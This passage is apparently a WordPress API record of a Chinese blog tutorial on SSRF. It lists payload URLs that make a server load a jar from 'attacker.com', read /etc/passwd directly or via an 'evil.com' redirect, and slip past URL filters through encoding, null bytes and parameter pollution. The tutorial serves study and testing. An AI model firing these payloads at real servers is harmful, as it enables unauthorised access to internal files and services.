e2d\uff0c\u53ef\u80fd\u5b58\u5728FTP\u547d\u4ee4\u6ce8\u5165\u7684\u53ef\u80fd\u6027<\/code><\/pre>\n<p>\u5176\u4ed6\uff1a<\/p>\n<pre><code>jar\u534f\u8bae\uff1a\u8bbf\u95eeJava\u5f52\u6863\u6587\u4ef6\nhttp:\/\/target.com\/fetch?url=jar:http:\/\/attacker.com\/malicious.jar!\/\n\nnetdoc\u534f\u8bae\uff1aJava\u7279\u6709\u534f\u8bae\uff0c\u53ef\u7528\u4e8e\u6587\u4ef6\u8bbf\u95ee\nhttp:\/\/target.com\/fetch?url=netdoc:\/etc\/passwd\n\ndata\u534f\u8bae\uff1a\u76f4\u63a5\u5728URL\u4e2d\u5d4c\u5165\u6570\u636e\nhttp:\/\/target.com\/fetch?url=data:text\/plain,Hello%20World<\/code><\/pre>\n<h3>\u534f\u8bae\u8fc7\u6ee4\u7ed5\u8fc7\uff1a<\/h3>\n<p><strong>\u534f\u8bae\u5d4c\u5957<\/strong>\uff1a\u5728\u5141\u8bb8\u7684\u534f\u8bae\u4e2d\u5d4c\u5957\u5176\u4ed6\u534f\u8bae\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/evil.com\/file.php?url=file:\/\/\/etc\/passwd<\/code><\/pre>\n<p><strong>URL\u91cd\u5b9a\u5411<\/strong>\uff1a\u5229\u7528\u91cd\u5b9a\u5411\u4ecehttp\u8df3\u8f6c\u5230\u5176\u4ed6\u534f\u8bae\uff1a<\/p>\n<pre><code># evil.com\u8bbe\u7f6e\u91cd\u5b9a\u5411\u5230file:\/\/\/etc\/passwd\nhttp:\/\/target.com\/fetch?url=http:\/\/evil.com\/redirect<\/code><\/pre>\n<p><strong>\u534f\u8bae\u5927\u5c0f\u5199\u6df7\u5408<\/strong>\uff1a\u67d0\u4e9b\u89e3\u6790\u5668\u5bf9\u534f\u8bae\u5927\u5c0f\u5199\u4e0d\u654f\u611f\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=Http:\/\/internal\/\nhttp:\/\/target.com\/fetch?url=https:\/\/internal\/<\/code><\/pre>\n<p><strong>\u534f\u8bae\u76f8\u5bf9URL<\/strong>\uff1a\u4f7f\u7528\u534f\u8bae\u76f8\u5bf9URL\uff08\/\/\uff09\u7ee7\u627f\u5f53\u524d\u9875\u9762\u534f\u8bae\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=\/\/internal\/<\/code><\/pre>\n<h3>\u8fc7\u6ee4\u5668\u7ed5\u8fc7\u6280\u672f\uff1a<\/h3>\n<p><strong>\u53cc\u91cdURL\u7f16\u7801<\/strong>\uff1a\u7ed5\u8fc7\u5355\u6b21\u89e3\u7801\u7684\u8fc7\u6ee4\u5668\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/%252F%252Finternal\/<\/code><\/pre>\n<p><strong>\u7a7a\u5b57\u8282\u6ce8\u5165<\/strong>\uff1a\u5728\u67d0\u4e9b\u8bed\u8a00\u5b9e\u73b0\u4e2d\uff0c\u53ef\u4ee5\u4f7f\u7528\u7a7a\u5b57\u8282\u622a\u65ad\u5b57\u7b26\u4e32\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/allowed-domain.com%00internal\/<\/code><\/pre>\n<p><strong>\u8def\u5f84\u89c4\u8303\u5316\u5dee\u5f02<\/strong>\uff1a\u5229\u7528\u4e0d\u540c\u7cfb\u7edf\u8def\u5f84\u89c4\u8303\u5316\u7684\u5dee\u5f02\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/internal\/.\/.\/.\/admin<\/code><\/pre>\n<p><strong>\u53c2\u6570\u6c61\u67d3<\/strong>\uff1a\u63d0\u4f9b\u591a\u4e2a\u540c\u540d\u53c2\u6570\uff0c\u6df7\u6dc6\u8fc7\u6ee4\u903b\u8f91\uff1a<\/p>\n<pre><code>http:\/\/target.com\/fetch?url=http:\/\/allowed.com&amp;url=http:\/\/internal\/<\/code><\/pre>\n<p><strong>HTTP\u5934\u6ce8\u5165<\/strong>\uff1a\u5728\u67d0\u4e9b\u5b9e\u73b0\u4e2d\uff0c\u53ef\u4ee5\u901a\u8fc7\u6ce8\u5165HTTP\u5934\u5f71\u54cd\u8bf7\u6c42\u76ee\u6807\uff1a<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SSRF \u6982\u5ff5\uff1a\u653b\u51fb\u8005\u901a\u8fc7\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u5229\u7528\u670d\u52a1\u5668\u7aef\u7684\u5e94\u7528\u7a0b\u5e8f\u53d1\u8d77\u4f2a\u9020\u7684\u8bf7\u6c42\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\uff0cSSRF\u653b\u51fb\u7684\u76ee\u6807\u662f\u4ece\u5916 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-71","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=71"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions"}],"predecessor-version":[{"id":98,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/71\/revisions\/98"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=71"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=71"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=71"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}